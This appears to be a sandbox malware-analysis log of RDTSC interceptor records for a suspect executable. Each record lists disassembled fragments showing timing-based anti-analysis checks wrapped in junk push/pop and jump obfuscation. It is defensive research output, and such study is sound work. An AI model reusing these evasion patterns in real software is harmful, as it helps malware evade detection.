Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60158 second address: 6E60174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test esi, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9D01181AB1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60174 second address: 6E601AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov edx, 6F23FBAEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007F9D00F1E9C3h 0x00000013 jmp 00007F9D00F1DB65h 0x00000018 xchg eax, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9D00F1DB5Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E601AC second address: 6E601B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E601B2 second address: 6E601B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E601B6 second address: 6E601BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E601BA second address: 6E60205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F9D00F1DB64h 0x00000010 adc eax, 5ED0BF88h 0x00000016 jmp 00007F9D00F1DB5Bh 0x0000001b popfd 0x0000001c mov esi, 7475BBFFh 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9D00F1DB61h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60205 second address: 6E6022F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [74E50B60h] 0x0000000f mov eax, 750BE5E0h 0x00000014 ret 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9D01181AADh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6022F second address: 6E602A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000044h 0x0000000b pushad 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 mov edi, ecx 0x00000012 popad 0x00000013 pushad 0x00000014 movzx ecx, bx 0x00000017 pushfd 0x00000018 jmp 00007F9D00F1DB5Dh 0x0000001d add cx, 6016h 0x00000022 jmp 00007F9D00F1DB61h 0x00000027 popfd 0x00000028 popad 0x00000029 popad 0x0000002a pop edi 0x0000002b jmp 00007F9D00F1DB5Eh 0x00000030 xchg eax, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F9D00F1DB67h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E602A2 second address: 6E602F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F9D01181AB1h 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov cl, B7h 0x00000013 movsx edi, cx 0x00000016 popad 0x00000017 push dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9D01181AB7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E602F4 second address: 6E6034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 76h 0x00000005 pushfd 0x00000006 jmp 00007F9D00F1DB60h 0x0000000b and si, 2DB8h 0x00000010 jmp 00007F9D00F1DB5Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f pushad 0x00000020 push esi 0x00000021 jmp 00007F9D00F1DB5Bh 0x00000026 pop eax 0x00000027 mov cx, bx 0x0000002a popad 0x0000002b push dword ptr [eax+18h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F9D00F1DB5Dh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6034A second address: 6E60350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60350 second address: 6E60367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB63h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E603C0 second address: 6E603C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E603C6 second address: 6E60403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 3Ch 0x00000005 pushfd 0x00000006 jmp 00007F9D00F1DB65h 0x0000000b or ecx, 33BDE886h 0x00000011 jmp 00007F9D00F1DB61h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test esi, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60403 second address: 6E6040C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 5F3Ch 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6040C second address: 6E60421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB61h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60526 second address: 6E605A5 instructions: 0x00000000 rdtsc 0x00000002 mov dx, F386h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dx, C212h 0x0000000c popad 0x0000000d mov dword ptr [esi+10h], eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov edx, 4B98EEF8h 0x00000017 call 00007F9D01181AB1h 0x0000001c pop ecx 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007F9D01181AB1h 0x00000024 or cl, FFFFFF96h 0x00000027 jmp 00007F9D01181AB1h 0x0000002c popfd 0x0000002d popad 0x0000002e mov eax, dword ptr [ebx+50h] 0x00000031 jmp 00007F9D01181AAEh 0x00000036 mov dword ptr [esi+14h], eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F9D01181AB7h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E605A5 second address: 6E6060A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c jmp 00007F9D00F1DB5Eh 0x00000011 mov dword ptr [esi+18h], eax 0x00000014 pushad 0x00000015 movzx esi, bx 0x00000018 mov ebx, 34C4FF8Eh 0x0000001d popad 0x0000001e mov eax, dword ptr [ebx+58h] 0x00000021 jmp 00007F9D00F1DB65h 0x00000026 mov dword ptr [esi+1Ch], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F9D00F1DB5Dh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6060A second address: 6E6062C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, si 0x00000012 mov bx, cx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6062C second address: 6E6063C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6063C second address: 6E60683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+20h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F9D01181AB4h 0x00000015 sub al, FFFFFFF8h 0x00000018 jmp 00007F9D01181AABh 0x0000001d popfd 0x0000001e mov si, EB2Fh 0x00000022 popad 0x00000023 mov eax, dword ptr [ebx+60h] 0x00000026 pushad 0x00000027 mov ebx, eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60683 second address: 6E60714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F9D00F1DB68h 0x00000009 pop esi 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esi+24h], eax 0x0000000f jmp 00007F9D00F1DB61h 0x00000014 mov eax, dword ptr [ebx+64h] 0x00000017 pushad 0x00000018 movzx eax, dx 0x0000001b mov dx, EDFCh 0x0000001f popad 0x00000020 mov dword ptr [esi+28h], eax 0x00000023 pushad 0x00000024 mov cl, dh 0x00000026 mov si, 5A39h 0x0000002a popad 0x0000002b mov eax, dword ptr [ebx+68h] 0x0000002e jmp 00007F9D00F1DB64h 0x00000033 mov dword ptr [esi+2Ch], eax 0x00000036 jmp 00007F9D00F1DB60h 0x0000003b mov ax, word ptr [ebx+6Ch] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F9D00F1DB67h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60714 second address: 6E60798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d jmp 00007F9D01181AAEh 0x00000012 mov ax, word ptr [ebx+00000088h] 0x00000019 jmp 00007F9D01181AB0h 0x0000001e mov word ptr [esi+32h], ax 0x00000022 jmp 00007F9D01181AB0h 0x00000027 mov eax, dword ptr [ebx+0000008Ch] 0x0000002d jmp 00007F9D01181AB0h 0x00000032 mov dword ptr [esi+34h], eax 0x00000035 pushad 0x00000036 mov dh, al 0x00000038 mov dx, C35Eh 0x0000003c popad 0x0000003d mov eax, dword ptr [ebx+18h] 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60798 second address: 6E6079C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6079C second address: 6E607A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E607A0 second address: 6E607A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E607A6 second address: 6E607F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007F9D01181AAEh 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9D01181AB7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E607F0 second address: 6E60818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, dx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60818 second address: 6E6081D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6081D second address: 6E60832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB61h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60832 second address: 6E608D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b pushad 0x0000000c mov ch, bl 0x0000000e pushfd 0x0000000f jmp 00007F9D01181AB4h 0x00000014 sbb ecx, 41CEB8D8h 0x0000001a jmp 00007F9D01181AABh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esi+40h], eax 0x00000024 pushad 0x00000025 pushad 0x00000026 mov si, 0BA1h 0x0000002a pushfd 0x0000002b jmp 00007F9D01181AAEh 0x00000030 sub cl, 00000038h 0x00000033 jmp 00007F9D01181AABh 0x00000038 popfd 0x00000039 popad 0x0000003a push eax 0x0000003b pushfd 0x0000003c jmp 00007F9D01181AAFh 0x00000041 sub al, FFFFFFFEh 0x00000044 jmp 00007F9D01181AB9h 0x00000049 popfd 0x0000004a pop esi 0x0000004b popad 0x0000004c lea eax, dword ptr [ebx+00000080h] 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F9D01181AAAh 0x00000059 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E608D2 second address: 6E608FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c mov dh, ch 0x0000000e mov dh, 65h 0x00000010 popad 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9D00F1DB5Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E608FB second address: 6E609B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, dx 0x0000000e pushfd 0x0000000f jmp 00007F9D01181AB3h 0x00000014 adc ch, 0000007Eh 0x00000017 jmp 00007F9D01181AB9h 0x0000001c popfd 0x0000001d popad 0x0000001e nop 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F9D01181AACh 0x00000026 sbb cl, 00000078h 0x00000029 jmp 00007F9D01181AABh 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F9D01181AB8h 0x00000035 sub cx, 4BD8h 0x0000003a jmp 00007F9D01181AABh 0x0000003f popfd 0x00000040 popad 0x00000041 lea eax, dword ptr [ebp-10h] 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F9D01181AB5h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E609B2 second address: 6E609D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D00F1DB5Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E609D7 second address: 6E609DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A2B second address: 6E60A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A2F second address: 6E60A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A4C second address: 6E60A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A52 second address: 6E60A84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b push ecx 0x0000000c call 00007F9D01181AB7h 0x00000011 pop eax 0x00000012 pop edx 0x00000013 popad 0x00000014 js 00007F9D6F1206F1h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A84 second address: 6E60A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A88 second address: 6E60A99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A99 second address: 6E60ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 2342143Eh 0x00000014 mov ecx, ebx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60ABC second address: 6E60AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9D01181AAAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60AE1 second address: 6E60AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60AE5 second address: 6E60AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60AEB second address: 6E60AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60AF1 second address: 6E60AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60AF5 second address: 6E60AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60AF9 second address: 6E60B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+78h] 0x0000000b pushad 0x0000000c mov bh, cl 0x0000000e pushfd 0x0000000f jmp 00007F9D01181AB7h 0x00000014 and eax, 301953AEh 0x0000001a jmp 00007F9D01181AB9h 0x0000001f popfd 0x00000020 popad 0x00000021 push 00000001h 0x00000023 jmp 00007F9D01181AAEh 0x00000028 nop 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60BC7 second address: 6E60BD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60BD6 second address: 6E60C3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007F9D01181AAEh 0x00000010 test edi, edi 0x00000012 jmp 00007F9D01181AB0h 0x00000017 js 00007F9D6F12054Ah 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007F9D01181AACh 0x00000026 adc si, A368h 0x0000002b jmp 00007F9D01181AABh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60C3C second address: 6E60CBB instructions: 0x00000000 rdtsc 0x00000002 call 00007F9D00F1DB68h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F9D00F1DB5Bh 0x00000010 add esi, 7C6D6F5Eh 0x00000016 jmp 00007F9D00F1DB69h 0x0000001b popfd 0x0000001c popad 0x0000001d mov eax, dword ptr [ebp-04h] 0x00000020 jmp 00007F9D00F1DB5Eh 0x00000025 mov dword ptr [esi+08h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007F9D00F1DB5Dh 0x00000030 jmp 00007F9D00F1DB60h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60CBB second address: 6E60CD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, F1h 0x00000011 mov dx, si 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60CD6 second address: 6E60CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60CDD second address: 6E60D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000001h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9D01181AB9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60D03 second address: 6E60D07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60D07 second address: 6E60D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60D0D second address: 6E60D3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 call 00007F9D00F1DB66h 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60D3C second address: 6E60D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60D42 second address: 6E60D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9D00F1DB69h 0x0000000e nop 0x0000000f jmp 00007F9D00F1DB5Eh 0x00000014 lea eax, dword ptr [ebp-18h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F9D00F1DB67h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60D8F second address: 6E60D95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60D95 second address: 6E60D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60D99 second address: 6E60D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60E75 second address: 6E60EB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F9D00F1DB5Ch 0x00000015 adc ch, FFFFFF98h 0x00000018 jmp 00007F9D00F1DB5Bh 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E60EB1 second address: 6E60EEF instructions: 0x00000000 rdtsc 0x00000002 mov esi, 32E4424Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F9D01181AB4h 0x0000000f sub ch, FFFFFFF8h 0x00000012 jmp 00007F9D01181AABh 0x00000017 popfd 0x00000018 popad 0x00000019 mov edx, 74E806ECh 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 mov edi, 76CD74D4h 0x00000028 popad 0x00000029 rdtsc
